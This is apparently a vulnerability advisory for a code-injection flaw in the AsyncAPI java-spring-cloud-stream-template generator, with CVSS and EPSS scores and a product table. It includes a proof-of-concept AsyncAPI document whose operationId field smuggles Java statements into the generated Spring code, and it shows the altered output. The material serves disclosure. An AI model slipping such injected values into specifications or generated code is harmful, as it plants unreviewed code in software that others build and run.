CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
EPSS
Percentile
50.5%
The following was initially reported by @jonaslagoni:
Given the following command:
ag ./dummy.json @asyncapi/java-spring-cloud-stream-template --force-write --output ./output
With the following AsyncAPI document:
{
"asyncapi": "2.0.0",
"info": {
"title": "Streetlight",
"version": "1.0.0"
},
"defaultContentType": "json",
"channels": {
"security/audit/channel": {
"description": "Channel for the turn on command which should turn on the streetlight",
"parameters": {
"streetlight_id": {
"description": "The ID of the streetlight",
"schema": {
"type": "string"
}
}
},
"publish": {
"operationId": "test() { System.out.println(\"injected\"); return test(0); }\n public Consumer<CustomClass> someothername",
"message": {
"name": "TurnonCommand",
"payload": {
"$ref": "#/components/schemas/CustomClass"
}
}
}
}
},
"components": {
"schemas" : {
"CustomClass": {
"type": "object",
"properties": {
"prop": {
"type": "string"
}
}
}
}
}
}
Which changes the following output:
...
@Bean
public Consumer<CustomClass> test() {
// Add business logic here.
return null;
}
...
To
...
@Bean
public Consumer<CustomClass> test() { System.out.println("injected"); return someothername(); }
public Consumer<CustomClass> someothername() {
// Add business logic here.
return null;
}
...
Vendor | Product | Version | CPE |
---|---|---|---|
asyncapi | java-spring-cloud-stream-template | * | cpe:2.3:a:asyncapi:java-spring-cloud-stream-template:*:*:*:*:*:*:*:* |
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
EPSS
Percentile
50.5%